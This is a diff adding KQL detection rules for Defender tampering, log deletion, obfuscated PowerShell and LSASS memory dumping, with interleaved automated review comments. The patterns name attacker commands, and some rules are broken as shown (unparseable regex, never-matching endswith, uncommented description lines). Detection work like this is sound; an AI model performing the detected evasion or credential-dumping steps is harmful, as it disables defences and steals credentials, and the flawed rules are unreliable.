diff --git a/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql
new file mode 100644
index 00000000..77b323a6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_console_history_logs_deleted.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Console History Logs Deleted
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070
+
+DeviceFileEvents
+| where FolderPath endswith "\\PSReadLine\\ConsoleHost_history.txt"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..7fdd5b39
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_core_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Core DLL Loaded Via Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects PowerShell core DLL being loaded by an Office Product
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql
new file mode 100644
index 00000000..ed0c9d81
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_defender_disable_scan_feature.kql
@@ -0,0 +1,13 @@
+// Title: Powershell Defender Disable Scan Feature
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-03
+// Level: high
+// Description: Detects requests to disable Microsoft Defender features using PowerShell commands
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Possible administrative activity
+// - Other Cmdlets that may use the same parameters
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql
new file mode 100644
index 00000000..19f19cf2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_defender_exclusion.kql
@@ -0,0 +1,13 @@
+// Title: Powershell Defender Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-29
+// Level: medium
+// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Possible Admin Activity
+// - Other Cmdlets that may use the same parameters
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
new file mode 100644
index 00000000..36da9f08
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
@@ -0,0 +1,15 @@
+// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
+This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
+An attacker might use this technique via the command line to bypass defenses before executing payloads.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Highly unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
new file mode 100644
index 00000000..dc49a90c
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_executed_from_headless_conhost_process.kql
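Review bot: `ProcessCommandLine contains "6"` and `ProcessCommandLine contains "9"` in the final group match any command line that has those digits anywhere (a path, a PID, a date), so once `Set-MpPreference` and one of the `*ThreatDefaultAction` switches are present the numeric alternative adds almost no selectivity and this `Level: high` rule will fire on benign values such as `Quarantine` whenever a 6 or 9 appears elsewhere on the line. If fidelity to the upstream rule is not required, bind the value to the switch it belongs to: `ProcessCommandLine matches regex @"(?i)(ThreatDefaultAction|tdefac)\s+(Allow|NoAction|6|9)\b"`. Otherwise a comment on the `| where` line noting the known over-match would save the next triage from rediscovering it.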
@@ -0,0 +1,12 @@
+// Title: Powershell Executed From Headless ConHost Process
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the use of powershell commands from headless ConHost window.
+The "--headless" flag hides the windows from the user upon execution.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
new file mode 100644
index 00000000..f3709ea0
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_logging_disabled_via_registry_key_tampering.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Logging Disabled Via Registry Key Tampering
+// Author: frack113
+// Date: 2022-04-02
+// Level: high
+// Description: Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\PowerShell*" or RegistryKey endswith "\\Microsoft\\PowerShellCore*") and (RegistryKey endswith "\\ModuleLogging\\EnableModuleLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockLogging" or RegistryKey endswith "\\ScriptBlockLogging\\EnableScriptBlockInvocationLogging" or RegistryKey endswith "\\Transcription\\EnableTranscripting" or RegistryKey endswith "\\Transcription\\EnableInvocationHeader" or RegistryKey endswith "\\EnableScripts")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql
new file mode 100644
index 00000000..1f796e48
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_script_change_permission_via_set_acl.kql
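Review bot: The `where` predicate in this hunk can never be true: KQL `endswith` treats the trailing `*` in `"\\Microsoft\\Windows\\PowerShell*"` as a literal character, and a key cannot end with that and with `"\\ModuleLogging\\EnableModuleLogging"` at the same time; the same Sigma wildcard carried over into `endswith` appears in python_function_execution_security_warning_disabled_in_excel_registry.kql and rdp_sensitive_settings_changed.kql. In DeviceRegistryEvents the value name is a separate column, so the value-name suffixes belong on `RegistryValueName` rather than `RegistryKey`, and as far as I know DWORD data there is a plain decimal string rather than Sysmon's `DWORD (0x00000000)` text — confirm against live data before relying on it. A shape that expresses the intent would be `RegistryValueData == "0" and (RegistryKey contains "\\Microsoft\\Windows\\PowerShell\\" or RegistryKey contains "\\Microsoft\\PowerShellCore\\") and RegistryValueName in~ ("EnableModuleLogging", "EnableScriptBlockLogging", "EnableScriptBlockInvocationLogging", "EnableTranscripting", "EnableInvocationHeader", "EnableScripts")`. Since the converter emitted these lines, the fix belongs in its wildcard and field mapping for registry rules rather than in hand edits to each file.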
@@ -0,0 +1,10 @@
+// Title: PowerShell Script Change Permission Via Set-Acl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell execution to set the ACL of a file or a folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql
new file mode 100644
index 00000000..653acae6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_set_acl_on_windows_folder.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Set-Acl On Windows Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql
new file mode 100644
index 00000000..8c648c23
--- /dev/null
+++ b/KQL/rules/Defense Evasion/powershell_token_obfuscation_process_creation.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Token Obfuscation - Process Creation
+// Author: frack113
+// Date: 2022-12-27
+// Level: high
+// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/prefetch_file_deleted.kql b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql
new file mode 100644
index 00000000..0708ecd6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/prefetch_file_deleted.kql
@@ -0,0 +1,10 @@
+// Title: Prefetch File Deleted
+// Author: Cedric MAURUGEON
+// Date: 2021-09-29
+// Level: high
+// Description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+
+DeviceFileEvents
+| where (FolderPath contains ":\\Windows\\Prefetch\\" and FolderPath endswith ".pf") and (not((InitiatingProcessFolderPath endswith ":\\windows\\system32\\svchost.exe" and (RequestAccountName contains "AUTHORI" or RequestAccountName contains "AUTORI"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/procdump_execution.kql b/KQL/rules/Defense Evasion/procdump_execution.kql
new file mode 100644
index 00000000..79edbce1
--- /dev/null
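Review bot: The second regex in the `where` clause of powershell_token_obfuscation_process_creation.kql, `""(\\{\\d\\})+"\\s*-f"`, is not a valid KQL string literal: the inner double quotes are unescaped, so the literal ends after `""` and the whole query fails to parse, which silently disables the rule. Escaping them or switching the delimiter fixes it, e.g. `ProcessCommandLine matches regex '"(\\{\\d\\})+"\\s*-f'`. A syntax check of each emitted query in the conversion script would catch this class of error across the rule set, since any Sigma regex containing a double quote will hit it.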
+++ b/KQL/rules/Defense Evasion/procdump_execution.kql
@@ -0,0 +1,12 @@
+// Title: Procdump Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-16
+// Level: medium
+// Description: Detects usage of the SysInternals Procdump utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Legitimate use of procdump by a developer or administrator
+
+DeviceProcessEvents
+| where FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
new file mode 100644
index 00000000..efb0fafa
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_access_via_trolleyexpress_exclusion.kql
@@ -0,0 +1,10 @@
+// Title: Process Access via TrolleyExpress Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-10
+// Level: high
+// Description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\TrolleyExpress 7" or ProcessCommandLine contains "\\TrolleyExpress 8" or ProcessCommandLine contains "\\TrolleyExpress 9" or ProcessCommandLine contains "\\TrolleyExpress.exe 7" or ProcessCommandLine contains "\\TrolleyExpress.exe 8" or ProcessCommandLine contains "\\TrolleyExpress.exe 9" or ProcessCommandLine contains "\\TrolleyExpress.exe -ma ") or (FolderPath endswith "\\TrolleyExpress.exe" and (not((isnull(ProcessVersionInfoOriginalFileName) or ProcessVersionInfoOriginalFileName contains "CtxInstall"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
new file mode 100644
index 00000000..43b5b502
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_creation_using_sysnative_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Creation Using Sysnative Folder
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-08-23
+// Level: medium
+// Description: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\Windows\\Sysnative\\" or FolderPath contains ":\\Windows\\Sysnative\\") and (not((ProcessCommandLine contains "install" and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or FolderPath contains "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v") and FolderPath endswith "\\ngen.exe"))) and (not((ProcessCommandLine contains "\"C:\\Windows\\sysnative\\cmd.exe\"" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
new file mode 100644
index 00000000..a7e38ca7
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_execution_from_a_potentially_suspicious_folder.kql
@@ -0,0 +1,10 @@
+// Title: Process Execution From A Potentially Suspicious Folder
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2019-01-16
+// Level: high
+// Description: Detects a potentially suspicious execution from an uncommon folder.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\All Users\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\NetworkService\\" or FolderPath contains ":\\Windows\\addins\\" or FolderPath contains ":\\Windows\\debug\\" or FolderPath contains ":\\Windows\\Fonts\\" or FolderPath contains ":\\Windows\\Help\\" or FolderPath contains ":\\Windows\\IME\\" or FolderPath contains ":\\Windows\\Media\\" or FolderPath contains ":\\Windows\\repair\\" or FolderPath contains ":\\Windows\\security\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains "$Recycle.bin" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_launched_without_image_name.kql b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql
new file mode 100644
index 00000000..6cbdad72
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_launched_without_image_name.kql
@@ -0,0 +1,12 @@
+// Title: Process Launched Without Image Name
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Rare legitimate software.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
new file mode 100644
index 00000000..ff040eff
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_memory_dump_via_comsvcs_dll.kql
@@ -0,0 +1,12 @@
+// Title: Process Memory Dump Via Comsvcs.DLL
+// Author: Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2020-02-18
+// Level: high
+// Description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1036, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") and ((ProcessCommandLine contains "#-" or ProcessCommandLine contains "#+" or ProcessCommandLine contains "#24" or ProcessCommandLine contains "24 " or ProcessCommandLine contains "MiniDump" or ProcessCommandLine contains "#65560") and (ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))) or ((ProcessCommandLine contains " #" or ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains "\"#") and (ProcessCommandLine contains "24" and ProcessCommandLine contains "comsvcs" and ProcessCommandLine contains "full"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
new file mode 100644
index 00000000..595bfd68
--- /dev/null
+++ b/KQL/rules/Defense Evasion/process_memory_dump_via_dotnet_dump.kql
@@ -0,0 +1,13 @@
+// Title: Process Memory Dump Via Dotnet-Dump
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-14
+// Level: medium
+// Description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
